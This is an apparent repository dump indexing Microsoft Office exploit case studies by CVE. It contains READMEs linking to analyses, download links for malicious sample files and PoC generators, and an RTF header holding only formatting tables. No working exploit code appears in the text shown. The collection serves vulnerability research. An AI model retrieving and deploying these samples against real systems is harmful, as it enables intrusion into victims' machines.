├── CVE-2012-0158&CVE-2012-1856 ├── CVE-2012-0158 │ ├── 09700a4d4979dfb98ce3a04db59efd8d522d5f06bee756af767dc94519a604fd.bin.gz │ └── README.md ├── CVE-2012-1856 │ ├── 76021e5a95a666f468dc7ea99e5a49e5d42b82bc37e9e9a4338b24155ed4451a.bin.gz │ ├── CVE-2012-1856分析报告.pdf │ └── README.md ├── MSCOMCTL_2007.OCX ├── README.md └── mscomctl_2007.dbg ├── CVE-2013-3906 ├── 0639c38a0a563284cd96b3cd4caddc09263d6891c79c4241d98abb3fcea32c27.bin.gz └── README.md ├── CVE-2014-1761 ├── README.md └── e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a.bin.gz ├── CVE-2014-4114&CVE-2014-6352 ├── 70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf.bin.gz ├── README.md └── e99f089bf209d5caea948f424881cbf6652658b973a5b97dbb59db6e03e8c907.bin.gz ├── CVE-2015-0097 ├── Create-Recordset.hta ├── POC-Generator.vbs ├── README.md ├── Readme + Instructions.rtf └── poc.bin ├── CVE-2015-1641 ├── 8bb066160763ba4a0b65ae86d3cfedff8102e2eacbf4e83812ea76ea5ab61a31.bin.gz └── README.md ├── CVE-2015-2545 ├── 3a65d4b3bc18352675cd02154ffb388035463089d59aad36cadb1646f3a3b0fc.bin.gz └── README.md ├── CVE-2016-7193 ├── 00bc76898f07f18122f386b890d79c9338d223a5b5c89213a4bbf1040bccfa28.bin.gz └── README.md ├── CVE-2017-0199&CVE-2017-8570 └── README.md ├── CVE-2017-0261&CVE-2017-0262 ├── 6785e29698444243677300db6a0c519909ae9e620d575e76d9be4862b33ed490.bin.gz ├── 91acb0d56771af0196e34ac95194b3d0bf3200bc5f6208caf3a91286958876f9.bin.gz ├── README.md └── ef783cc3c4e1e0649b4629f3396cff4c0e0e0e67c07cacb8a9ae7c0cfa16bf0c.bin.gz ├── CVE-2017-11826 ├── README.md └── aed93c002574f25dabd1859f080203a2c8f332e92c80db9aa983316695d938d3.bin.gz ├── CVE-2017-11882&CVE-2018-0802&CVE-2018-0798 ├── 25a473ec43acfe80182d3fd6cd9cf87ac362a18b78a554bf1dda8d9dc05bee08.bin.gz ├── README.md ├── cve-2018-0802 poc with aslr-bypass.rtf └── cve-2018-0802 poc with comments.rtf ├── CVE-2017-8759 ├── 0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684.bin.gz └── README.md ├── README.md └── papers ├── Attacking Interoperability-An OLE Edition.pdf ├── Moniker Magic-Running Scripts Directly in Microsoft Office.pdf ├── OLE object are still dangerous today-Exploiting Microsoft Office.pdf └── Persisting with Microsoft Office-Abusing Extensibility Options.pdf /CVE-2012-0158&CVE-2012-1856/CVE-2012-0158/09700a4d4979dfb98ce3a04db59efd8d522d5f06bee756af767dc94519a604fd.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2012-0158&CVE-2012-1856/CVE-2012-0158/09700a4d4979dfb98ce3a04db59efd8d522d5f06bee756af767dc94519a604fd.bin.gz -------------------------------------------------------------------------------- /CVE-2012-0158&CVE-2012-1856/CVE-2012-0158/README.md: -------------------------------------------------------------------------------- 1 | reference: 2 | 3 | 1.[永远的经典:CVE-2012-0158漏洞分析、利用、检测和总结](https://www.anquanke.com/post/id/91643) 4 | 5 | 2.[Recycling Known Vulnerabilities -Old Cyber Attack Goes Stealth](http://blog.morphisec.com/recycling-exploits-cyber-security) 6 | 7 | There are so many analysis about this,but reference1 is the most detailed and reference2 is an analysis of a sample that exploit this vulnerability,it used some interesting techniques to bypass AV. 8 | -------------------------------------------------------------------------------- /CVE-2012-0158&CVE-2012-1856/CVE-2012-1856/76021e5a95a666f468dc7ea99e5a49e5d42b82bc37e9e9a4338b24155ed4451a.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2012-0158&CVE-2012-1856/CVE-2012-1856/76021e5a95a666f468dc7ea99e5a49e5d42b82bc37e9e9a4338b24155ed4451a.bin.gz -------------------------------------------------------------------------------- /CVE-2012-0158&CVE-2012-1856/CVE-2012-1856/CVE-2012-1856分析报告.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2012-0158&CVE-2012-1856/CVE-2012-1856/CVE-2012-1856分析报告.pdf -------------------------------------------------------------------------------- /CVE-2012-0158&CVE-2012-1856/CVE-2012-1856/README.md: -------------------------------------------------------------------------------- 1 | I wrote an analysis myself:[CVE-2012-1856 Office ActiveX控件MSCOMCTL.OCX UAF漏洞分析](https://bbs.kanxue.com/thread-223844.htm). 2 | -------------------------------------------------------------------------------- /CVE-2012-0158&CVE-2012-1856/MSCOMCTL_2007.OCX: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2012-0158&CVE-2012-1856/MSCOMCTL_2007.OCX -------------------------------------------------------------------------------- /CVE-2012-0158&CVE-2012-1856/README.md: -------------------------------------------------------------------------------- 1 | Given the fact that both CVE-2012-0158 and CVE-2012-1856 are about MSCOMCTL.OCX so I just put them together.Many years ago Microsoft gave symbol file of it,but not now.Here give the dbg file and MSCOMCTL.OCX(6.1.97.82) to help you understand them. 2 | -------------------------------------------------------------------------------- /CVE-2012-0158&CVE-2012-1856/mscomctl_2007.dbg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2012-0158&CVE-2012-1856/mscomctl_2007.dbg -------------------------------------------------------------------------------- /CVE-2013-3906/0639c38a0a563284cd96b3cd4caddc09263d6891c79c4241d98abb3fcea32c27.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2013-3906/0639c38a0a563284cd96b3cd4caddc09263d6891c79c4241d98abb3fcea32c27.bin.gz -------------------------------------------------------------------------------- /CVE-2013-3906/README.md: -------------------------------------------------------------------------------- 1 | reference: 2 | 3 | [CVE-2013-3906漏洞分析](https://bbs.kanxue.com/thread-225993.htm) 4 | 5 | [手把手教你如何构造office漏洞EXP(第二期)](https://www.anquanke.com/post/id/84536) 6 | -------------------------------------------------------------------------------- /CVE-2014-1761/README.md: -------------------------------------------------------------------------------- 1 | reference: 2 | 3 | [A Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers](https://www.mcafee.com/blogs/internet-security/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/) 4 | -------------------------------------------------------------------------------- /CVE-2014-1761/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2014-1761/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a.bin.gz -------------------------------------------------------------------------------- /CVE-2014-4114&CVE-2014-6352/70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2014-4114&CVE-2014-6352/70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf.bin.gz -------------------------------------------------------------------------------- /CVE-2014-4114&CVE-2014-6352/README.md: -------------------------------------------------------------------------------- 1 | Given the fact that CVE-2014-6352 is CVE-2014-4114's patch bypass so I just put them together. 2 | 3 | reference: 4 | 5 | [Bypassing Microsoft’s Patch for the Sandworm Zero Day: a Detailed Look at the Root Cause](https://www.mcafee.com/blogs/internet-security/bypassing-microsofts-patch-sandworm-zero-day-root-cause/) 6 | 7 | [Bypassing Microsoft’s Patch for the Sandworm Zero Day: Even ‘Editing’ Can Cause Harm](https://www.mcafee.com/blogs/internet-security/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm/) 8 | 9 | [An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm”](https://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/) 10 | -------------------------------------------------------------------------------- /CVE-2014-4114&CVE-2014-6352/e99f089bf209d5caea948f424881cbf6652658b973a5b97dbb59db6e03e8c907.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2014-4114&CVE-2014-6352/e99f089bf209d5caea948f424881cbf6652658b973a5b97dbb59db6e03e8c907.bin.gz -------------------------------------------------------------------------------- /CVE-2015-0097/Create-Recordset.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /CVE-2015-0097/POC-Generator.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2015-0097/POC-Generator.vbs -------------------------------------------------------------------------------- /CVE-2015-0097/README.md: -------------------------------------------------------------------------------- 1 | reference:[Microsoft Word Local Machine Zone Remote Code Execution](https://packetstormsecurity.com/files/132761/Microsoft-Word-Local-Machine-Zone-Remote-Code-Execution.html) 2 | -------------------------------------------------------------------------------- /CVE-2015-0097/Readme + Instructions.rtf: -------------------------------------------------------------------------------- 1 | {\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1046\deflangfe1046\themelang1046\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;} 2 | {\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f5\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070409020205020404}Courier{\*\falt Courier New};}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;} 3 | {\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;} 4 | {\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;} 5 | {\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;} 6 | {\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;} 7 | {\fhiminor\f31506\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\fbiminor\f31507\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f325\fbidi \froman\fcharset238\fprq2 Times New Roman CE;} 8 | {\f326\fbidi \froman\fcharset204\fprq2 Times New Roman Cyr;}{\f328\fbidi \froman\fcharset161\fprq2 Times New Roman Greek;}{\f329\fbidi \froman\fcharset162\fprq2 Times New Roman Tur;}{\f330\fbidi \froman\fcharset177\fprq2 Times New Roman (Hebrew);} 9 | {\f331\fbidi \froman\fcharset178\fprq2 Times New Roman (Arabic);}{\f332\fbidi \froman\fcharset186\fprq2 Times New Roman Baltic;}{\f333\fbidi \froman\fcharset163\fprq2 Times New Roman (Vietnamese);}{\f345\fbidi \fmodern\fcharset238\fprq1 Courier New CE;} 10 | {\f346\fbidi \fmodern\fcharset204\fprq1 Courier New Cyr;}{\f348\fbidi \fmodern\fcharset161\fprq1 Courier New Greek;}{\f349\fbidi \fmodern\fcharset162\fprq1 Courier New Tur;}{\f350\fbidi \fmodern\fcharset177\fprq1 Courier New (Hebrew);} 11 | {\f351\fbidi \fmodern\fcharset178\fprq1 Courier New (Arabic);}{\f352\fbidi \fmodern\fcharset186\fprq1 Courier New Baltic;}{\f353\fbidi \fmodern\fcharset163\fprq1 Courier New (Vietnamese);}{\f665\fbidi \froman\fcharset238\fprq2 Cambria Math CE;} 12 | {\f666\fbidi \froman\fcharset204\fprq2 Cambria Math Cyr;}{\f668\fbidi \froman\fcharset161\fprq2 Cambria Math Greek;}{\f669\fbidi \froman\fcharset162\fprq2 Cambria Math Tur;}{\f672\fbidi \froman\fcharset186\fprq2 Cambria Math Baltic;} 13 | {\f673\fbidi \froman\fcharset163\fprq2 Cambria Math (Vietnamese);}{\f695\fbidi \fswiss\fcharset238\fprq2 Calibri CE;}{\f696\fbidi \fswiss\fcharset204\fprq2 Calibri Cyr;}{\f698\fbidi \fswiss\fcharset161\fprq2 Calibri Greek;} 14 | {\f699\fbidi \fswiss\fcharset162\fprq2 Calibri Tur;}{\f702\fbidi \fswiss\fcharset186\fprq2 Calibri Baltic;}{\f703\fbidi \fswiss\fcharset163\fprq2 Calibri (Vietnamese);}{\f705\fbidi \fswiss\fcharset238\fprq2 Tahoma CE;} 15 | {\f706\fbidi \fswiss\fcharset204\fprq2 Tahoma Cyr;}{\f708\fbidi \fswiss\fcharset161\fprq2 Tahoma Greek;}{\f709\fbidi \fswiss\fcharset162\fprq2 Tahoma Tur;}{\f710\fbidi \fswiss\fcharset177\fprq2 Tahoma (Hebrew);} 16 | {\f711\fbidi \fswiss\fcharset178\fprq2 Tahoma (Arabic);}{\f712\fbidi \fswiss\fcharset186\fprq2 Tahoma Baltic;}{\f713\fbidi \fswiss\fcharset163\fprq2 Tahoma (Vietnamese);}{\f714\fbidi \fswiss\fcharset222\fprq2 Tahoma (Thai);} 17 | {\flomajor\f31508\fbidi \froman\fcharset238\fprq2 Times New Roman CE;}{\flomajor\f31509\fbidi \froman\fcharset204\fprq2 Times New Roman Cyr;}{\flomajor\f31511\fbidi \froman\fcharset161\fprq2 Times New Roman Greek;} 18 | {\flomajor\f31512\fbidi \froman\fcharset162\fprq2 Times New Roman Tur;}{\flomajor\f31513\fbidi \froman\fcharset177\fprq2 Times New Roman (Hebrew);}{\flomajor\f31514\fbidi \froman\fcharset178\fprq2 Times New Roman (Arabic);} 19 | {\flomajor\f31515\fbidi \froman\fcharset186\fprq2 Times New Roman Baltic;}{\flomajor\f31516\fbidi \froman\fcharset163\fprq2 Times New Roman (Vietnamese);}{\fdbmajor\f31518\fbidi \froman\fcharset238\fprq2 Times New Roman CE;} 20 | {\fdbmajor\f31519\fbidi \froman\fcharset204\fprq2 Times New Roman Cyr;}{\fdbmajor\f31521\fbidi \froman\fcharset161\fprq2 Times New Roman Greek;}{\fdbmajor\f31522\fbidi \froman\fcharset162\fprq2 Times New Roman Tur;} 21 | {\fdbmajor\f31523\fbidi \froman\fcharset177\fprq2 Times New Roman (Hebrew);}{\fdbmajor\f31524\fbidi \froman\fcharset178\fprq2 Times New Roman (Arabic);}{\fdbmajor\f31525\fbidi \froman\fcharset186\fprq2 Times New Roman Baltic;} 22 | {\fdbmajor\f31526\fbidi \froman\fcharset163\fprq2 Times New Roman (Vietnamese);}{\fhimajor\f31528\fbidi \froman\fcharset238\fprq2 Cambria CE;}{\fhimajor\f31529\fbidi \froman\fcharset204\fprq2 Cambria Cyr;} 23 | {\fhimajor\f31531\fbidi \froman\fcharset161\fprq2 Cambria Greek;}{\fhimajor\f31532\fbidi \froman\fcharset162\fprq2 Cambria Tur;}{\fhimajor\f31535\fbidi \froman\fcharset186\fprq2 Cambria Baltic;} 24 | {\fhimajor\f31536\fbidi \froman\fcharset163\fprq2 Cambria (Vietnamese);}{\fbimajor\f31538\fbidi \froman\fcharset238\fprq2 Times New Roman CE;}{\fbimajor\f31539\fbidi \froman\fcharset204\fprq2 Times New Roman Cyr;} 25 | {\fbimajor\f31541\fbidi \froman\fcharset161\fprq2 Times New Roman Greek;}{\fbimajor\f31542\fbidi \froman\fcharset162\fprq2 Times New Roman Tur;}{\fbimajor\f31543\fbidi \froman\fcharset177\fprq2 Times New Roman (Hebrew);} 26 | {\fbimajor\f31544\fbidi \froman\fcharset178\fprq2 Times New Roman (Arabic);}{\fbimajor\f31545\fbidi \froman\fcharset186\fprq2 Times New Roman Baltic;}{\fbimajor\f31546\fbidi \froman\fcharset163\fprq2 Times New Roman (Vietnamese);} 27 | {\flominor\f31548\fbidi \froman\fcharset238\fprq2 Times New Roman CE;}{\flominor\f31549\fbidi \froman\fcharset204\fprq2 Times New Roman Cyr;}{\flominor\f31551\fbidi \froman\fcharset161\fprq2 Times New Roman Greek;} 28 | {\flominor\f31552\fbidi \froman\fcharset162\fprq2 Times New Roman Tur;}{\flominor\f31553\fbidi \froman\fcharset177\fprq2 Times New Roman (Hebrew);}{\flominor\f31554\fbidi \froman\fcharset178\fprq2 Times New Roman (Arabic);} 29 | {\flominor\f31555\fbidi \froman\fcharset186\fprq2 Times New Roman Baltic;}{\flominor\f31556\fbidi \froman\fcharset163\fprq2 Times New Roman (Vietnamese);}{\fdbminor\f31558\fbidi \froman\fcharset238\fprq2 Times New Roman CE;} 30 | {\fdbminor\f31559\fbidi \froman\fcharset204\fprq2 Times New Roman Cyr;}{\fdbminor\f31561\fbidi \froman\fcharset161\fprq2 Times New Roman Greek;}{\fdbminor\f31562\fbidi \froman\fcharset162\fprq2 Times New Roman Tur;} 31 | {\fdbminor\f31563\fbidi \froman\fcharset177\fprq2 Times New Roman (Hebrew);}{\fdbminor\f31564\fbidi \froman\fcharset178\fprq2 Times New Roman (Arabic);}{\fdbminor\f31565\fbidi \froman\fcharset186\fprq2 Times New Roman Baltic;} 32 | {\fdbminor\f31566\fbidi \froman\fcharset163\fprq2 Times New Roman (Vietnamese);}{\fhiminor\f31568\fbidi \fswiss\fcharset238\fprq2 Calibri CE;}{\fhiminor\f31569\fbidi \fswiss\fcharset204\fprq2 Calibri Cyr;} 33 | {\fhiminor\f31571\fbidi \fswiss\fcharset161\fprq2 Calibri Greek;}{\fhiminor\f31572\fbidi \fswiss\fcharset162\fprq2 Calibri Tur;}{\fhiminor\f31575\fbidi \fswiss\fcharset186\fprq2 Calibri Baltic;} 34 | {\fhiminor\f31576\fbidi \fswiss\fcharset163\fprq2 Calibri (Vietnamese);}{\fbiminor\f31578\fbidi \froman\fcharset238\fprq2 Times New Roman CE;}{\fbiminor\f31579\fbidi \froman\fcharset204\fprq2 Times New Roman Cyr;} 35 | {\fbiminor\f31581\fbidi \froman\fcharset161\fprq2 Times New Roman Greek;}{\fbiminor\f31582\fbidi \froman\fcharset162\fprq2 Times New Roman Tur;}{\fbiminor\f31583\fbidi \froman\fcharset177\fprq2 Times New Roman (Hebrew);} 36 | {\fbiminor\f31584\fbidi \froman\fcharset178\fprq2 Times New Roman (Arabic);}{\fbiminor\f31585\fbidi \froman\fcharset186\fprq2 Times New Roman Baltic;}{\fbiminor\f31586\fbidi \froman\fcharset163\fprq2 Times New Roman (Vietnamese);}} 37 | {\colortbl;\red0\green0\blue0;\red0\green0\blue255;\red0\green255\blue255;\red0\green255\blue0;\red255\green0\blue255;\red255\green0\blue0;\red255\green255\blue0;\red255\green255\blue255;\red0\green0\blue128;\red0\green128\blue128;\red0\green128\blue0; 38 | \red128\green0\blue128;\red128\green0\blue0;\red128\green128\blue0;\red128\green128\blue128;\red192\green192\blue192;\chyperlink\ctint255\cshade255\red0\green0\blue255;}{\*\defchp \f31506\fs22\lang1046\langfe1033\langfenp1033 }{\*\defpap 39 | \ql \li0\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0 }\noqfpromote {\stylesheet{\ql \li0\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0 \rtlch\fcs1 40 | \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 \snext0 \sqformat \spriority0 \styrsid14503194 Normal;}{\*\cs10 \additive \ssemihidden \sunhideused \spriority1 Default Paragraph Font;}{\* 41 | \ts11\tsrowd\trftsWidthB3\trpaddl108\trpaddr108\trpaddfl3\trpaddft3\trpaddfb3\trpaddfr3\trcbpat1\trcfpat1\tblind0\tblindtype3\tscellwidthfts0\tsvertalt\tsbrdrt\tsbrdrl\tsbrdrb\tsbrdrr\tsbrdrdgl\tsbrdrdgr\tsbrdrh\tsbrdrv \ql \li0\ri0\sa200\sl276\slmult1 42 | \widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0 \rtlch\fcs1 \af31506\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 \snext11 \ssemihidden \sunhideused \sqformat Normal Table;}{ 43 | \s15\ql \li0\ri0\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0 \rtlch\fcs1 \af38\afs16\alang1025 \ltrch\fcs0 \f38\fs16\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 44 | \sbasedon0 \snext15 \slink16 \ssemihidden \sunhideused \styrsid15488378 Balloon Text;}{\*\cs16 \additive \rtlch\fcs1 \af38\afs16 \ltrch\fcs0 \f38\fs16 \sbasedon10 \slink15 \slocked \ssemihidden \styrsid15488378 Texto de bal\'e3o Char;}{\*\cs17 \additive 45 | \rtlch\fcs1 \af0 \ltrch\fcs0 \ul\cf17 \sbasedon10 \sunhideused \styrsid2625030 Hyperlink;}{\s18\ql \li720\ri0\sa200\sl276\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin720\itap0\contextualspace \rtlch\fcs1 46 | \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1046\langfe1033\cgrid\langnp1046\langfenp1033 \sbasedon0 \snext18 \sqformat \spriority34 \styrsid6693792 List Paragraph;}}{\*\listtable{\list\listtemplateid-152508142\listhybrid{\listlevel\levelnfc23 47 | \levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace0\levelindent0{\leveltext\leveltemplateid1433176812\'01-;}{\levelnumbers;}\loch\af37\hich\af37\dbch\af0\fbias0\hres0\chhres0 \fi-360\li720\lin720 }{\listlevel\levelnfc23\levelnfcn23 48 | \leveljc0\leveljcn0\levelfollow0\levelstartat1\lvltentative\levelspace0\levelindent0{\leveltext\leveltemplateid68550659\'01o;}{\levelnumbers;}\f2\fbias0\hres0\chhres0 \fi-360\li1440\lin1440 }{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0 49 | \levelfollow0\levelstartat1\lvltentative\levelspace0\levelindent0{\leveltext\leveltemplateid68550661\'01\u-3929 ?;}{\levelnumbers;}\f10\fbias0\hres0\chhres0 \fi-360\li2160\lin2160 }{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0 50 | \levelstartat1\lvltentative\levelspace0\levelindent0{\leveltext\leveltemplateid68550657\'01\u-3913 ?;}{\levelnumbers;}\f3\fbias0\hres0\chhres0 \fi-360\li2880\lin2880 }{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1 51 | \lvltentative\levelspace0\levelindent0{\leveltext\leveltemplateid68550659\'01o;}{\levelnumbers;}\f2\fbias0\hres0\chhres0 \fi-360\li3600\lin3600 }{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\lvltentative\levelspace0 52 | \levelindent0{\leveltext\leveltemplateid68550661\'01\u-3929 ?;}{\levelnumbers;}\f10\fbias0\hres0\chhres0 \fi-360\li4320\lin4320 }{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\lvltentative\levelspace0\levelindent0 53 | {\leveltext\leveltemplateid68550657\'01\u-3913 ?;}{\levelnumbers;}\f3\fbias0\hres0\chhres0 \fi-360\li5040\lin5040 }{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\lvltentative\levelspace0\levelindent0{\leveltext 54 | \leveltemplateid68550659\'01o;}{\levelnumbers;}\f2\fbias0\hres0\chhres0 \fi-360\li5760\lin5760 }{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\lvltentative\levelspace0\levelindent0{\leveltext\leveltemplateid68550661 55 | \'01\u-3929 ?;}{\levelnumbers;}\f10\fbias0\hres0\chhres0 \fi-360\li6480\lin6480 }{\listname ;}\listid1125464208}{\list\listtemplateid-1606107398\listhybrid{\listlevel\levelnfc4\levelnfcn4\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace0 56 | \levelindent0{\leveltext\leveltemplateid68550679\'02\'00);}{\levelnumbers\'01;}\rtlch\fcs1 \af0 \ltrch\fcs0 \fbias0\hres0\chhres0 \fi-360\li720\lin720 }{\listlevel\levelnfc4\levelnfcn4\leveljc0\leveljcn0\levelfollow0\levelstartat1\lvltentative\levelspace0 57 | \levelindent0{\leveltext\leveltemplateid68550681\'02\'01.;}{\levelnumbers\'01;}\rtlch\fcs1 \af0 \ltrch\fcs0 \hres0\chhres0 \fi-360\li1440\lin1440 }{\listlevel\levelnfc2\levelnfcn2\leveljc2\leveljcn2\levelfollow0\levelstartat1\lvltentative\levelspace0 58 | \levelindent0{\leveltext\leveltemplateid68550683\'02\'02.;}{\levelnumbers\'01;}\rtlch\fcs1 \af0 \ltrch\fcs0 \hres0\chhres0 \fi-180\li2160\lin2160 }{\listlevel\levelnfc0\levelnfcn0\leveljc0\leveljcn0\levelfollow0\levelstartat1\lvltentative\levelspace0 59 | \levelindent0{\leveltext\leveltemplateid68550671\'02\'03.;}{\levelnumbers\'01;}\rtlch\fcs1 \af0 \ltrch\fcs0 \hres0\chhres0 \fi-360\li2880\lin2880 }{\listlevel\levelnfc4\levelnfcn4\leveljc0\leveljcn0\levelfollow0\levelstartat1\lvltentative\levelspace0 60 | \levelindent0{\leveltext\leveltemplateid68550681\'02\'04.;}{\levelnumbers\'01;}\rtlch\fcs1 \af0 \ltrch\fcs0 \hres0\chhres0 \fi-360\li3600\lin3600 }{\listlevel\levelnfc2\levelnfcn2\leveljc2\leveljcn2\levelfollow0\levelstartat1\lvltentative\levelspace0 61 | \levelindent0{\leveltext\leveltemplateid68550683\'02\'05.;}{\levelnumbers\'01;}\rtlch\fcs1 \af0 \ltrch\fcs0 \hres0\chhres0 \fi-180\li4320\lin4320 }{\listlevel\levelnfc0\levelnfcn0\leveljc0\leveljcn0\levelfollow0\levelstartat1\lvltentative\levelspace0 62 | \levelindent0{\leveltext\leveltemplateid68550671\'02\'06.;}{\levelnumbers\'01;}\rtlch\fcs1 \af0 \ltrch\fcs0 \hres0\chhres0 \fi-360\li5040\lin5040 }{\listlevel\levelnfc4\levelnfcn4\leveljc0\leveljcn0\levelfollow0\levelstartat1\lvltentative\levelspace0 63 | \levelindent0{\leveltext\leveltemplateid68550681\'02\'07.;}{\levelnumbers\'01;}\rtlch\fcs1 \af0 \ltrch\fcs0 \hres0\chhres0 \fi-360\li5760\lin5760 }{\listlevel\levelnfc2\levelnfcn2\leveljc2\leveljcn2\levelfollow0\levelstartat1\lvltentative\levelspace0 64 | \levelindent0{\leveltext\leveltemplateid68550683\'02\'08.;}{\levelnumbers\'01;}\rtlch\fcs1 \af0 \ltrch\fcs0 \hres0\chhres0 \fi-180\li6480\lin6480 }{\listname ;}\listid1137335923}}{\*\listoverridetable{\listoverride\listid1125464208\listoverridecount0\ls1} 65 | {\listoverride\listid1137335923\listoverridecount0\ls2}}{\*\pgptbl {\pgp\ipgp0\itap0\li0\ri0\sb0\sa0}}{\*\rsidtbl \rsid72542\rsid345227\rsid351972\rsid1115785\rsid1404842\rsid2102927\rsid2497317\rsid2625030\rsid3813740\rsid3957940\rsid4355271\rsid4676177 66 | \rsid5003448\rsid5077247\rsid6115905\rsid6693792\rsid7217648\rsid7758669\rsid7815248\rsid7935471\rsid8941851\rsid9401379\rsid9574928\rsid9783260\rsid9862839\rsid10045041\rsid10902464\rsid10968836\rsid12610344\rsid12866886\rsid13270317\rsid13502416 67 | \rsid14503194\rsid15093189\rsid15156907\rsid15301639\rsid15488378\rsid16082893}{\mmathPr\mmathFont34\mbrkBin0\mbrkBinSub0\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author Eduardo}{\operator Eduardo} 68 | {\creatim\yr2014\mo2\dy12\hr21\min40}{\revtim\yr2015\mo7\dy16\min1}{\version16}{\edmins133}{\nofpages1}{\nofwords519}{\nofchars2521}{\nofcharsws3034}{\vern32775}{\*\saveprevpict}}{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}} 69 | \paperw11906\paperh16838\margl1701\margr1701\margt1417\margb1417\gutter0\ltrsect 70 | 